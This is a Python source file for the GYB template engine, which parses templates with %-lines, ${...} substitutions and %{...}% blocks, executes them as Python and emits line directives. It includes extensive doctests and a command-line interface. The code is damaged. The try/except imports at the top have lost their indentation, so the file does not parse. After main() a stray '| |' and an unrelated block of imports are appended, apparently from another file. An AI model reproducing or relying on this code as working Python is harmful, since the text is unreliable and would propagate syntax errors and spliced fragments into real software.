# GYB: Generate Your Boilerplate (improved names welcome; at least
# this one's short). See -h output for instructions
from __future__ import print_function
import os
import re
import sys
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
import textwrap
import tokenize
from bisect import bisect
try:
basestring
except NameError:
basestring = str
def get_line_starts(s):
    """Return a list containing the start index of each line in s.

    The list also contains a sentinel index for the end of the string,
    so there will be one more element in the list than there are lines
    in the string.
    """
    starts = [0]
    offset = 0
    for line in s.split('\n'):
        # +1 accounts for the '\n' separator consumed by split().
        offset += len(line) + 1
        starts.append(offset)
    # The final line has no trailing newline; pull the sentinel back by one.
    starts[-1] -= 1
    return starts
def strip_trailing_nl(s):
    """If s ends with a newline, drop it; else return s intact."""
    if s.endswith('\n'):
        return s[:-1]
    return s
def split_lines(s):
    """Split s into a list of lines, each of which has a trailing newline.

    If the lines are later concatenated, the result is s, possibly
    with a single appended newline.
    """
    return [piece + '\n' for piece in s.split('\n')]
# text on a line up to the first '$$', '${', or '%%'
literalText = r'(?: [^$\n%] | \$(?![${]) | %(?!%) )*'
# The part of an '%end' line that follows the '%' sign
linesClose = r'[\ \t]* end [\ \t]* (?: \# .* )? $'
# Note: Where "# Absorb" appears below, the regexp attempts to eat up
# through the end of ${...} and %{...}% constructs. In reality we
# handle this with the Python tokenizer, which avoids mis-detections
# due to nesting, comments and strings. This extra absorption in the
# regexp facilitates testing the regexp on its own, by preventing the
# interior of some of these constructs from being treated as literal
# text.
tokenize_re = re.compile(
r'''
# %-lines and %{...}-blocks
# \n? # absorb one preceding newline
^
(?:
(?P<gybLines>
(?P<_indent> [\ \t]* % (?! [{%] ) [\ \t]* ) (?! [\ \t] | ''' +
linesClose + r''' ) .*
( \n (?P=_indent) (?! ''' + linesClose + r''' ) .* ) *
)
| (?P<gybLinesClose> [\ \t]* % [ \t]* ''' + linesClose + r''' )
| [\ \t]* (?P<gybBlockOpen> %\{ )
(?: [^}]| \} (?!%) )* \}% # Absorb
)
\n? # absorb one trailing newline
# Substitutions
| (?P<substitutionOpen> \$\{ )
[^}]* \} # Absorb
# %% and $$ are literal % and $ respectively
| (?P<symbol>[$%]) (?P=symbol)
# Literal text
| (?P<literal> ''' + literalText + r'''
(?:
# newline that doesn't precede space+%
(?: \n (?! [\ \t]* %[^%] ) )
''' + literalText + r'''
)*
\n?
)
''', re.VERBOSE | re.MULTILINE)
# Matches the '}%' closing a %{...}% code block, plus trailing whitespace
# and an optional newline. BUG FIX: the pattern was a plain string with
# the invalid escape sequence '\}' (DeprecationWarning, and a SyntaxWarning
# on Python 3.12+); a raw string compiles to the identical regex.
gyb_block_close = re.compile(r'\}%[ \t]*\n?')
def token_pos_to_index(token_pos, start, line_starts):
    """Translate a tokenize (line, column) pair into an absolute
    position in source text given the position where we started
    tokenizing and a list that maps lines onto their starting
    character indexes.
    """
    rel_line_plus1, col = token_pos
    # Line number (in the whole text) at which tokenizing began.
    first_line = bisect(line_starts, start) - 1
    # Absolute line of the token: tokenize counts lines from 1.
    token_line = rel_line_plus1 - 1 + first_line
    # A token reported on the tokenizer's first line must have its column
    # shifted by however far into that line tokenizing started.
    if rel_line_plus1 == 1:
        col += start - line_starts[first_line]
    # Sometimes tokenizer errors report a line beyond the last one.
    if token_line >= len(line_starts):
        return line_starts[-1]
    return line_starts[token_line] + col
def tokenize_python_to_unmatched_close_curly(source_text, start, line_starts):
    """Apply Python's tokenize to source_text starting at index start
    while matching open and close curly braces. When an unmatched
    close curly brace is found, return its index. If not found,
    return len(source_text). If there's a tokenization error, return
    the position of the error.
    """
    reader = StringIO(source_text)
    reader.seek(start)
    depth = 0
    try:
        for tok in tokenize.generate_tokens(reader.readline):
            text, token_start = tok[1], tok[2]
            if text == '{':
                depth += 1
            elif text == '}':
                depth -= 1
                if depth < 0:
                    # First close brace with no matching open brace.
                    return token_pos_to_index(token_start, start, line_starts)
    except tokenize.TokenError as error:
        (_, error_pos) = error.args
        return token_pos_to_index(error_pos, start, line_starts)
    return len(source_text)
def tokenize_template(template_text):
    r"""Given the text of a template, returns an iterator over
    (tokenType, token, match) tuples.

    **Note**: this is template syntax tokenization, not Python
    tokenization.

    When a non-literal token is matched, a client may call
    iter.send(pos) on the iterator to reset the position in
    template_text at which scanning will resume.

    This function provides a base level of tokenization which is
    then refined by ParseContext.token_generator.

    >>> from pprint import *
    >>> pprint(list((kind, text) for kind, text, _ in tokenize_template(
    ...   '%for x in range(10):\n%  print x\n%end\njuicebox')))
    [('gybLines', '%for x in range(10):\n%  print x'),
     ('gybLinesClose', '%end'),
     ('literal', 'juicebox')]

    >>> pprint(list((kind, text) for kind, text, _ in tokenize_template(
    ... '''Nothing
    ... % if x:
    ... %    for i in range(3):
    ... ${i}
    ... %    end
    ... % else:
    ... THIS SHOULD NOT APPEAR IN THE OUTPUT
    ... ''')))
    [('literal', 'Nothing\n'),
     ('gybLines', '% if x:\n%    for i in range(3):'),
     ('substitutionOpen', '${'),
     ('literal', '\n'),
     ('gybLinesClose', '%    end'),
     ('gybLines', '% else:'),
     ('literal', 'THIS SHOULD NOT APPEAR IN THE OUTPUT\n')]

    >>> for kind, text, _ in tokenize_template('''
    ... This is $some$ literal stuff containing a ${substitution}
    ... followed by a %{...} block:
    ...   %{
    ...   # Python code
    ...   }%
    ... and here $${are} some %-lines:
    ...   % x = 1
    ...   % y = 2
    ...   % if z == 3:
    ...   %    print '${hello}'
    ...   % end
    ...   %    for x in zz:
    ...   %        print x
    ...   % # different indentation
    ...   % twice
    ... and some lines that literally start with a %% token
    ... %% first line
    ...   %% second line
    ... '''):
    ...     print((kind, text.strip().split('\n',1)[0]))
    ('literal', 'This is $some$ literal stuff containing a')
    ('substitutionOpen', '${')
    ('literal', 'followed by a %{...} block:')
    ('gybBlockOpen', '%{')
    ('literal', 'and here ${are} some %-lines:')
    ('gybLines', '% x = 1')
    ('gybLinesClose', '% end')
    ('gybLines', '%    for x in zz:')
    ('gybLines', '% # different indentation')
    ('gybLines', '% twice')
    ('literal', 'and some lines that literally start with a % token')
    """
    pos = 0
    end = len(template_text)
    # Consecutive literal/symbol matches are buffered here and emitted as
    # a single 'literal' token; literal_first_match anchors its position.
    saved_literal = []
    literal_first_match = None
    while pos < end:
        m = tokenize_re.match(template_text, pos, end)
        # pull out the one matched key (ignoring internal patterns starting
        # with _)
        ((kind, text), ) = (
            (kind, text) for (kind, text) in m.groupdict().items()
            if text is not None and kind[0] != '_')
        if kind in ('literal', 'symbol'):
            if len(saved_literal) == 0:
                literal_first_match = m
            # literals and symbols get batched together
            saved_literal.append(text)
            pos = None
        else:
            # found a non-literal. First yield any literal we've accumulated
            if saved_literal != []:
                yield 'literal', ''.join(saved_literal), literal_first_match
                saved_literal = []
            # Then yield the thing we found. If we get a reply, it's
            # the place to resume tokenizing
            pos = yield kind, text, m
        # If we were not sent a new position by our client, resume
        # tokenizing at the end of this match.
        if pos is None:
            pos = m.end(0)
        else:
            # Client is not yet ready to process next token
            yield
    # Flush any literal text left in the buffer at end of template.
    if saved_literal != []:
        yield 'literal', ''.join(saved_literal), literal_first_match
def split_gyb_lines(source_lines):
    r"""Return a list of lines at which to split the incoming source

    These positions represent the beginnings of python line groups that
    will require a matching %end construct if they are to be closed.

    >>> src = split_lines('''\
    ... if x:
    ...    print x
    ... if y: # trailing comment
    ...    print z
    ... if z: # another comment\
    ... ''')
    >>> s = split_gyb_lines(src)
    >>> len(s)
    2
    >>> src[s[0]]
    '   print z\n'
    >>> s[1] - len(src)
    0

    >>> src = split_lines('''\
    ... if x:
    ...    if y: print 1
    ...    if z:
    ...       print 2
    ...    pass\
    ... ''')
    >>> s = split_gyb_lines(src)
    >>> len(s)
    1
    >>> src[s[0]]
    '   if y: print 1\n'

    >>> src = split_lines('''\
    ... if x:
    ...    if y:
    ...       print 1
    ...       print 2
    ... ''')
    >>> s = split_gyb_lines(src)
    >>> len(s)
    2
    >>> src[s[0]]
    '   if y:\n'
    >>> src[s[1]]
    '      print 1\n'
    """
    last_token_text, last_token_kind = None, None
    unmatched_indents = []
    dedents = 0
    try:
        for token_kind, token_text, token_start, \
                (token_end_line, token_end_col), line_text \
                in tokenize.generate_tokens(lambda i=iter(source_lines):
                                            next(i)):
            if token_kind in (tokenize.COMMENT, tokenize.ENDMARKER):
                continue
            # A ':' followed by a newline opens a block that will need %end.
            if token_text == '\n' and last_token_text == ':':
                unmatched_indents.append(token_end_line)
            # The tokenizer appends dedents at EOF; don't consider
            # those as matching indentations.  Instead just save them
            # up...
            if last_token_kind == tokenize.DEDENT:
                dedents += 1
            # And count them later, when we see something real.
            if token_kind != tokenize.DEDENT and dedents > 0:
                unmatched_indents = unmatched_indents[:-dedents]
                dedents = 0
            last_token_text, last_token_kind = token_text, token_kind
    except tokenize.TokenError:
        # Let the later compile() call report the error
        return []
    # Source ending in ':' opens one final block at the very end.
    if last_token_text == ':':
        unmatched_indents.append(len(source_lines))
    return unmatched_indents
def code_starts_with_dedent_keyword(source_lines):
    r"""Return True iff the incoming Python source_lines begin with "else",
    "elif", "except", or "finally".

    Initial comments and whitespace are ignored.

    >>> code_starts_with_dedent_keyword(split_lines('if x in y: pass'))
    False
    >>> code_starts_with_dedent_keyword(split_lines('except ifSomethingElse:'))
    True
    >>> code_starts_with_dedent_keyword(
    ...     split_lines('\n# comment\nelse: # yes'))
    True
    """
    token_text = None
    # Scan to the first token that is neither a comment nor pure
    # whitespace; that token decides the answer.
    for token_kind, token_text, _, _, _ \
            in tokenize.generate_tokens(lambda i=iter(source_lines): next(i)):

        if token_kind != tokenize.COMMENT and token_text.strip() != '':
            break

    return token_text in ('else', 'elif', 'except', 'finally')
class ParseContext(object):
    """State carried through a parse of a template"""

    filename = ''
    template = ''
    line_starts = []          # character offsets of each line start
    code_start_line = -1      # 0-based line of the current code token
    code_text = None          # Python text of the current code token
    tokens = None             # The rest of the tokens
    close_lines = False       # does the current token close a %-line group?

    def __init__(self, filename, template=None):
        self.filename = os.path.abspath(filename)
        if template is None:
            with open(filename) as f:
                self.template = f.read()
        else:
            self.template = template
        self.line_starts = get_line_starts(self.template)
        self.tokens = self.token_generator(tokenize_template(self.template))
        self.next_token()

    def pos_to_line(self, pos):
        # Map a character offset in the template to a 0-based line number.
        return bisect(self.line_starts, pos) - 1

    def token_generator(self, base_tokens):
        r"""Given an iterator over (kind, text, match) triples (see
        tokenize_template above), return a refined iterator over
        token_kinds.

        Among other adjustments to the elements found by base_tokens,
        this refined iterator tokenizes python code embedded in
        template text to help determine its true extent.  The
        expression "base_tokens.send(pos)" is used to reset the index at
        which base_tokens resumes scanning the underlying text.

        >>> ctx = ParseContext('dummy', '''
        ... %for x in y:
        ... %    print x
        ... % end
        ... literally
        ... ''')
        >>> while ctx.token_kind:
        ...     print((ctx.token_kind, ctx.code_text or ctx.token_text))
        ...     ignored = ctx.next_token()
        ('literal', '\n')
        ('gybLinesOpen', 'for x in y:\n')
        ('gybLines', '    print x\n')
        ('gybLinesClose', '% end')
        ('literal', 'literally\n')

        >>> ctx = ParseContext('dummy',
        ... '''Nothing
        ... % if x:
        ... %    for i in range(3):
        ... ${i}
        ... %    end
        ... % else:
        ... THIS SHOULD NOT APPEAR IN THE OUTPUT
        ... ''')
        >>> while ctx.token_kind:
        ...     print((ctx.token_kind, ctx.code_text or ctx.token_text))
        ...     ignored = ctx.next_token()
        ('literal', 'Nothing\n')
        ('gybLinesOpen', 'if x:\n')
        ('gybLinesOpen', '   for i in range(3):\n')
        ('substitutionOpen', 'i')
        ('literal', '\n')
        ('gybLinesClose', '%    end')
        ('gybLinesOpen', 'else:\n')
        ('literal', 'THIS SHOULD NOT APPEAR IN THE OUTPUT\n')

        >>> ctx = ParseContext('dummy',
        ... '''% for x in [1, 2, 3]:
        ... %   if x == 1:
        ... literal1
        ... %   elif x > 1:  # add output line here to fix bug
        ... %       if x == 2:
        ... literal2
        ... %       end
        ... %   end
        ... % end
        ... ''')
        >>> while ctx.token_kind:
        ...     print((ctx.token_kind, ctx.code_text or ctx.token_text))
        ...     ignored = ctx.next_token()
        ('gybLinesOpen', 'for x in [1, 2, 3]:\n')
        ('gybLinesOpen', '  if x == 1:\n')
        ('literal', 'literal1\n')
        ('gybLinesOpen', 'elif x > 1:  # add output line here to fix bug\n')
        ('gybLinesOpen', '    if x == 2:\n')
        ('literal', 'literal2\n')
        ('gybLinesClose', '%       end')
        ('gybLinesClose', '%   end')
        ('gybLinesClose', '% end')
        """
        for self.token_kind, self.token_text, self.token_match in base_tokens:
            kind = self.token_kind
            self.code_text = None

            # Do we need to close the current lines?
            self.close_lines = kind == 'gybLinesClose'

            # %{...}% and ${...} constructs
            if kind.endswith('Open'):

                # Tokenize text that follows as Python up to an unmatched '}'
                code_start = self.token_match.end(kind)
                self.code_start_line = self.pos_to_line(code_start)

                close_pos = tokenize_python_to_unmatched_close_curly(
                    self.template, code_start, self.line_starts)
                self.code_text = self.template[code_start:close_pos]
                yield kind

                if (kind == 'gybBlockOpen'):

                    # Absorb any '}% <optional-comment> \n'
                    m2 = gyb_block_close.match(self.template, close_pos)
                    if not m2:
                        raise ValueError("Invalid block closure")
                    next_pos = m2.end(0)
                else:
                    assert kind == 'substitutionOpen'

                    # skip past the closing '}'
                    next_pos = close_pos + 1

                # Resume tokenizing after the end of the code.
                base_tokens.send(next_pos)

            elif kind == 'gybLines':

                self.code_start_line = self.pos_to_line(
                    self.token_match.start('gybLines'))
                indentation = self.token_match.group('_indent')

                # Strip off the leading indentation and %-sign
                source_lines = re.split(
                    '^' + re.escape(indentation),
                    self.token_match.group('gybLines') + '\n',
                    flags=re.MULTILINE)[1:]

                if code_starts_with_dedent_keyword(source_lines):
                    self.close_lines = True

                last_split = 0
                for line in split_gyb_lines(source_lines):
                    self.token_kind = 'gybLinesOpen'
                    self.code_text = ''.join(source_lines[last_split:line])
                    yield self.token_kind
                    last_split = line
                    # NOTE(review): this increment is always zero because
                    # last_split was just assigned `line` on the previous
                    # statement — the delta was presumably meant to be
                    # computed first.  Doctests pass with the no-op;
                    # confirm against upstream before changing.
                    self.code_start_line += line - last_split
                    self.close_lines = False

                # Whatever remains after the last split is a plain
                # 'gybLines' code token.
                self.code_text = ''.join(source_lines[last_split:])
                if self.code_text:
                    self.token_kind = 'gybLines'
                    yield self.token_kind
            else:
                yield self.token_kind

    def next_token(self):
        """Move to the next token"""
        for kind in self.tokens:
            return self.token_kind

        # Token stream exhausted.
        self.token_kind = None
# Default format for the source-location markers injected into generated
# output; '%(file)s' and '%(line)d' are substituted per emitted chunk.
_default_line_directive = \
    '// ###sourceLocation(file: "%(file)s", line: %(line)d)'
class ExecutionContext(object):
    """State we pass around during execution of a template"""

    def __init__(self, line_directive=_default_line_directive,
                 **local_bindings):
        self.local_bindings = local_bindings
        self.line_directive = line_directive
        self.local_bindings['__context__'] = self
        self.result_text = []
        # (file, line) that produced the last appended text; used to decide
        # whether a new line directive is needed.
        self.last_file_line = None

    def append_text(self, text, file, line):
        """Append *text* originating at file:line, injecting a line
        directive when the source location changed."""
        # see if we need to inject a line marker
        if self.line_directive:
            if (file, line) != self.last_file_line:
                # We can only insert the line directive at a line break
                if len(self.result_text) == 0 \
                        or self.result_text[-1].endswith('\n'):
                    if sys.platform == 'win32':
                        file = file.replace('\\', '/')
                    substitutions = {'file': file, 'line': line + 1}
                    format_str = self.line_directive + '\n'
                    self.result_text.append(format_str % substitutions)
                # But if the new text contains any line breaks, we can create
                # one
                elif '\n' in text:
                    i = text.find('\n')
                    self.result_text.append(text[:i + 1])
                    # and try again
                    self.append_text(text[i + 1:], file, line + 1)
                    return

        self.result_text.append(text)
        self.last_file_line = (file, line + text.count('\n'))
class ASTNode(object):
    """Abstract base class for template AST nodes."""

    def __init__(self):
        raise NotImplementedError("ASTNode.__init__ is not implemented.")

    def execute(self, context):
        raise NotImplementedError("ASTNode.execute is not implemented.")

    def __str__(self, indent=''):
        raise NotImplementedError("ASTNode.__str__ is not implemented.")

    def format_children(self, indent):
        """Render self.children as an indented, bracketed list."""
        if not self.children:
            return ' []'

        deeper = indent + 4 * ' '
        rendered = ['', indent + '[']
        for child in self.children:
            rendered.append(child.__str__(deeper))
        rendered.append(indent + ']')
        return '\n'.join(rendered)
class Block(ASTNode):
    """A sequence of other AST nodes, to be executed in order."""
    children = []

    def __init__(self, context):
        # Consume tokens until the stream ends or a closing construct
        # ('%end' or a dedent keyword) terminates this group.
        self.children = []
        while context.token_kind and not context.close_lines:
            factory = Literal if context.token_kind == 'literal' else Code
            self.children.append(factory(context))

    def execute(self, context):
        for child in self.children:
            child.execute(context)

    def __str__(self, indent=''):
        return indent + 'Block:' + self.format_children(indent)
class Literal(ASTNode):
    """An AST node that generates literal text."""

    def __init__(self, context):
        # Capture the literal's text and source position, then advance
        # the parser past this token.
        self.text = context.token_text
        where = context.token_match.start(context.token_kind)
        self.start_line_number = context.pos_to_line(where)
        self.filename = context.filename
        context.next_token()

    def execute(self, context):
        context.append_text(self.text, self.filename, self.start_line_number)

    def __str__(self, indent=''):
        body = ['Literal:'] + strip_trailing_nl(self.text).split('\n')
        return '\n'.join(indent + line for line in body)
class Code(ASTNode):
    """An AST node that is evaluated as Python"""

    code = None        # the compiled code object
    children = ()      # nested Blocks executed via __children__
    kind = None

    def __init__(self, context):
        source = ''
        source_line_count = 0

        def accumulate_code():
            # Pad with blank lines so the compiled code reports line
            # numbers relative to the template file, splice in the
            # dedented code text, and advance past the token.
            s = source + (context.code_start_line - source_line_count) * '\n' \
                + textwrap.dedent(context.code_text)
            line_count = context.code_start_line + \
                context.code_text.count('\n')
            context.next_token()
            return s, line_count

        eval_exec = 'exec'
        if context.token_kind.startswith('substitution'):
            # ${...}: compiled as an expression so execute() gets a value.
            eval_exec = 'eval'
            source, source_line_count = accumulate_code()
            source = '(' + source.strip() + ')'

        else:
            # %-lines: each open suite executes its nested Block through
            # the __children__ binding set up in execute().
            while context.token_kind == 'gybLinesOpen':
                source, source_line_count = accumulate_code()
                source += '    __children__[%d].execute(__context__)\n' % len(
                    self.children)
                source_line_count += 1

                self.children += (Block(context),)

            if context.token_kind == 'gybLinesClose':
                context.next_token()

            if context.token_kind == 'gybLines':
                source, source_line_count = accumulate_code()

            # Only handle a substitution as part of this code block if
            # we don't already have some %-lines.
            elif context.token_kind == 'gybBlockOpen':

                # Opening ${...} and %{...}% constructs
                source, source_line_count = accumulate_code()

        self.filename = context.filename
        self.start_line_number = context.code_start_line
        self.code = compile(source, context.filename, eval_exec)
        self.source = source

    def execute(self, context):
        # Save __children__ from the local bindings
        save_children = context.local_bindings.get('__children__')
        # Execute the code with our __children__ in scope
        context.local_bindings['__children__'] = self.children
        context.local_bindings['__file__'] = self.filename
        result = eval(self.code, context.local_bindings)

        if context.local_bindings['__children__'] is not self.children:
            raise ValueError("The code is not allowed to mutate __children__")
        # Restore the bindings
        context.local_bindings['__children__'] = save_children

        # If we got a result, the code was an expression, so append
        # its value
        if result is not None \
                or (isinstance(result, basestring) and result != ''):
            from numbers import Number, Integral
            result_string = None
            # Non-integral numbers use repr() to keep full precision.
            if isinstance(result, Number) and not isinstance(result, Integral):
                result_string = repr(result)
            else:
                result_string = str(result)
            context.append_text(
                result_string, self.filename, self.start_line_number)

    def __str__(self, indent=''):
        source_lines = re.sub(r'^\n', '', strip_trailing_nl(
            self.source), flags=re.MULTILINE).split('\n')
        if len(source_lines) == 1:
            s = indent + 'Code: {' + source_lines[0] + '}'
        else:
            s = indent + 'Code:\n' + indent + '{\n' + '\n'.join(
                indent + 4 * ' ' + l for l in source_lines
            ) + '\n' + indent + '}'
        return s + self.format_children(indent)
def expand(filename, line_directive=_default_line_directive, **local_bindings):
    r"""Return the contents of the given template file, executed with the given
    local bindings.

    >>> from tempfile import NamedTemporaryFile
    >>> # On Windows, the name of a NamedTemporaryFile cannot be used to open
    >>> # the file for a second time if delete=True. Therefore, we have to
    >>> # manually handle closing and deleting this file to allow us to open
    >>> # the file by its name across all platforms.
    >>> f = NamedTemporaryFile(delete=False)
    >>> f.write(
    ... r'''---
    ... % for i in range(int(x)):
    ... a pox on ${i} for epoxy
    ... % end
    ... ${120 +
    ...
    ...    3}
    ... abc
    ... ${"w\nx\nX\ny"}
    ... z
    ... ''')
    >>> f.flush()
    >>> result = expand(
    ...     f.name,
    ...     line_directive='//#sourceLocation(file: "%(file)s", ' + \
    ...                    'line: %(line)d)',
    ...     x=2
    ... ).replace(
    ...     '"%s"' % f.name, '"dummy.file"')
    >>> print(result, end='')
    //#sourceLocation(file: "dummy.file", line: 1)
    ---
    //#sourceLocation(file: "dummy.file", line: 3)
    a pox on 0 for epoxy
    //#sourceLocation(file: "dummy.file", line: 3)
    a pox on 1 for epoxy
    //#sourceLocation(file: "dummy.file", line: 5)
    123
    //#sourceLocation(file: "dummy.file", line: 8)
    abc
    w
    x
    X
    y
    //#sourceLocation(file: "dummy.file", line: 10)
    z
    >>> f.close()
    >>> os.remove(f.name)
    """
    with open(filename) as f:
        t = parse_template(filename, f.read())
        # Execute from the template's own directory so relative opens and
        # imports inside the template resolve as its author expects.
        d = os.getcwd()
        os.chdir(os.path.dirname(os.path.abspath(filename)))
        try:
            return execute_template(
                t, line_directive=line_directive, **local_bindings)
        finally:
            os.chdir(d)
def parse_template(filename, text=None):
    r"""Return an AST corresponding to the given template file.

    If text is supplied, it is assumed to be the contents of the file,
    as a string.

    >>> print(parse_template('dummy.file', text=
    ... '''% for x in [1, 2, 3]:
    ... %   if x == 1:
    ... literal1
    ... %   elif x > 1:  # add output line after this line to fix bug
    ... %       if x == 2:
    ... literal2
    ... %       end
    ... %   end
    ... % end
    ... '''))
    Block:
    [
        Code:
        {
            for x in [1, 2, 3]:
                __children__[0].execute(__context__)
        }
        [
            Block:
            [
                Code:
                {
                    if x == 1:
                        __children__[0].execute(__context__)
                    elif x > 1:  # add output line after this line to fix bug
                        __children__[1].execute(__context__)
                }
                [
                    Block:
                    [
                        Literal:
                        literal1
                    ]
                    Block:
                    [
                        Code:
                        {
                            if x == 2:
                                __children__[0].execute(__context__)
                        }
                        [
                            Block:
                            [
                                Literal:
                                literal2
                            ]
                        ]
                    ]
                ]
            ]
        ]
    ]

    >>> print(parse_template(
    ...     'dummy.file',
    ...     text='%for x in range(10):\n%  print(x)\n%end\njuicebox'))
    Block:
    [
        Code:
        {
            for x in range(10):
                __children__[0].execute(__context__)
        }
        [
            Block:
            [
                Code: {print(x)} []
            ]
        ]
        Literal:
        juicebox
    ]

    >>> print(parse_template('/dummy.file', text=
    ... '''Nothing
    ... % if x:
    ... %    for i in range(3):
    ... ${i}
    ... %    end
    ... % else:
    ... THIS SHOULD NOT APPEAR IN THE OUTPUT
    ... '''))
    Block:
    [
        Literal:
        Nothing
        Code:
        {
            if x:
                __children__[0].execute(__context__)
            else:
                __children__[1].execute(__context__)
        }
        [
            Block:
            [
                Code:
                {
                    for i in range(3):
                        __children__[0].execute(__context__)
                }
                [
                    Block:
                    [
                        Code: {(i)} []
                        Literal:
                        <BLANKLINE>
                    ]
                ]
            ]
            Block:
            [
                Literal:
                THIS SHOULD NOT APPEAR IN THE OUTPUT
            ]
        ]
    ]

    >>> print(parse_template('dummy.file', text='''%
    ... %for x in y:
    ... %   print(y)
    ... '''))
    Block:
    [
        Code:
        {
            for x in y:
                __children__[0].execute(__context__)
        }
        [
            Block:
            [
                Code: {print(y)} []
            ]
        ]
    ]

    >>> print(parse_template('dummy.file', text='''%
    ... %if x:
    ... %   print(y)
    ... AAAA
    ... %else:
    ... BBBB
    ... '''))
    Block:
    [
        Code:
        {
            if x:
                __children__[0].execute(__context__)
            else:
                __children__[1].execute(__context__)
        }
        [
            Block:
            [
                Code: {print(y)} []
                Literal:
                AAAA
            ]
            Block:
            [
                Literal:
                BBBB
            ]
        ]
    ]

    >>> print(parse_template('dummy.file', text='''%
    ... %if x:
    ... %   print(y)
    ... AAAA
    ... %# This is a comment
    ... %else:
    ... BBBB
    ... '''))
    Block:
    [
        Code:
        {
            if x:
                __children__[0].execute(__context__)
            # This is a comment
            else:
                __children__[1].execute(__context__)
        }
        [
            Block:
            [
                Code: {print(y)} []
                Literal:
                AAAA
            ]
            Block:
            [
                Literal:
                BBBB
            ]
        ]
    ]

    >>> print(parse_template('dummy.file', text='''\
    ... %for x in y:
    ... AAAA
    ... %if x:
    ... BBBB
    ... %end
    ... CCCC
    ... '''))
    Block:
    [
        Code:
        {
            for x in y:
                __children__[0].execute(__context__)
        }
        [
            Block:
            [
                Literal:
                AAAA
                Code:
                {
                    if x:
                        __children__[0].execute(__context__)
                }
                [
                    Block:
                    [
                        Literal:
                        BBBB
                    ]
                ]
                Literal:
                CCCC
            ]
        ]
    ]
    """
    # The root of every template AST is a Block consuming the whole
    # token stream produced by ParseContext.
    return Block(ParseContext(filename, text))
def execute_template(
        ast, line_directive=_default_line_directive, **local_bindings):
    r"""Return the text generated by executing the given template AST.

    Keyword arguments become local variable bindings in the execution context

    >>> root_directory = os.path.abspath('/')
    >>> file_name = root_directory + 'dummy.file'
    >>> ast = parse_template(file_name, text=
    ... '''Nothing
    ... % if x:
    ... %    for i in range(3):
    ... ${i}
    ... %    end
    ... % else:
    ... THIS SHOULD NOT APPEAR IN THE OUTPUT
    ... ''')
    >>> out = execute_template(ast,
    ...     line_directive='//#sourceLocation(file: "%(file)s", line: %(line)d)',
    ...     x=1)
    >>> out = out.replace(file_name, "DUMMY-FILE")
    >>> print(out, end="")
    //#sourceLocation(file: "DUMMY-FILE", line: 1)
    Nothing
    //#sourceLocation(file: "DUMMY-FILE", line: 4)
    0
    //#sourceLocation(file: "DUMMY-FILE", line: 4)
    1
    //#sourceLocation(file: "DUMMY-FILE", line: 4)
    2

    >>> ast = parse_template(file_name, text=
    ... '''Nothing
    ... % a = []
    ... % for x in range(3):
    ... %    a.append(x)
    ... % end
    ... ${a}
    ... ''')
    >>> out = execute_template(ast,
    ...     line_directive='//#sourceLocation(file: "%(file)s", line: %(line)d)',
    ...     x=1)
    >>> out = out.replace(file_name, "DUMMY-FILE")
    >>> print(out, end="")
    //#sourceLocation(file: "DUMMY-FILE", line: 1)
    Nothing
    //#sourceLocation(file: "DUMMY-FILE", line: 6)
    [0, 1, 2]

    >>> ast = parse_template(file_name, text=
    ... '''Nothing
    ... % a = []
    ... % for x in range(3):
    ... %    a.append(x)
    ... % end
    ... ${a}
    ... ''')
    >>> out = execute_template(ast,
    ...     line_directive='#line %(line)d "%(file)s"', x=1)
    >>> out = out.replace(file_name, "DUMMY-FILE")
    >>> print(out, end="")
    #line 1 "DUMMY-FILE"
    Nothing
    #line 6 "DUMMY-FILE"
    [0, 1, 2]
    """
    # All generated chunks accumulate in the context; join them once at
    # the end.
    execution_context = ExecutionContext(
        line_directive=line_directive, **local_bindings)
    ast.execute(execution_context)
    return ''.join(execution_context.result_text)
def main():
    """
    Lint this file.
    >>> import sys
    >>> gyb_path = os.path.realpath(__file__).replace('.pyc', '.py')
    >>> sys.path.append(os.path.dirname(gyb_path))
    >>> import python_lint
    >>> python_lint.lint([gyb_path], verbose=False)
    0
    """
    import argparse
    import sys

    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description='Generate Your Boilerplate!', epilog='''
    A GYB template consists of the following elements:

      - Literal text which is inserted directly into the output

      - %% or $$ in literal text, which insert literal '%' and '$'
        symbols respectively.

      - Substitutions of the form ${<python-expression>}.  The Python
        expression is converted to a string and the result is inserted
        into the output.

      - Python code delimited by %{...}%.  Typically used to inject
        definitions (functions, classes, variable bindings) into the
        evaluation context of the template.  Common indentation is
        stripped, so you can add as much indentation to the beginning
        of this code as you like

      - Lines beginning with optional whitespace followed by a single
        '%' and Python code.  %-lines allow you to nest other
        constructs inside them.  To close a level of nesting, use the
        "%end" construct.

      - Lines beginning with optional whitespace and followed by a
        single '%' and the token "end", which close open constructs in
        %-lines.

    Example template:

          - Hello -
        %{
             x = 42
             def succ(a):
                 return a+1
        }%

        I can assure you that ${x} < ${succ(x)}

        % if int(y) > 7:
        %    for i in range(3):
        y is greater than seven!
        %    end
        % else:
        y is less than or equal to seven
        % end

          - The End. -

    When run with "gyb -Dy=9", the output is

          - Hello -

        I can assure you that 42 < 43

        y is greater than seven!
        y is greater than seven!
        y is greater than seven!

          - The End. -
'''
    )
    parser.add_argument(
        '-D', action='append', dest='defines', metavar='NAME=VALUE',
        default=[],
        help='''Bindings to be set in the template's execution context''')

    parser.add_argument(
        'file', type=argparse.FileType(),
        help='Path to GYB template file (defaults to stdin)', nargs='?',
        default=sys.stdin)
    parser.add_argument(
        '-o', dest='target', type=argparse.FileType('w'),
        help='Output file (defaults to stdout)', default=sys.stdout)
    parser.add_argument(
        '--test', action='store_true',
        default=False, help='Run a self-test')
    parser.add_argument(
        '--verbose-test', action='store_true',
        default=False, help='Run a verbose self-test')
    parser.add_argument(
        '--dump', action='store_true',
        default=False, help='Dump the parsed template to stdout')
    parser.add_argument(
        '--line-directive',
        default=_default_line_directive,
        help='''
             Line directive format string, which will be
             provided 2 substitutions, `%%(line)d` and `%%(file)s`.

             Example: `// #sourceLocation(file: "%%(file)s", line: %%(line)d)`
             ''')

    args = parser.parse_args(sys.argv[1:])

    if args.test or args.verbose_test:
        import doctest
        selfmod = sys.modules[__name__]
        if doctest.testmod(selfmod, verbose=args.verbose_test or None).failed:
            sys.exit(1)

    # -D NAME=VALUE pairs become template-local variable bindings.
    bindings = dict(x.split('=', 1) for x in args.defines)
    ast = parse_template(args.file.name, args.file.read())
    if args.dump:
        print(ast)
    # Allow the template to open files and import .py files relative to its own
    # directory
    os.chdir(os.path.dirname(os.path.abspath(args.file.name)))
    sys.path = ['.'] + sys.path
    args.target.write(execute_template(ast, args.line_directive, **bindings))
| |
import re
import time
import codecs
import xml
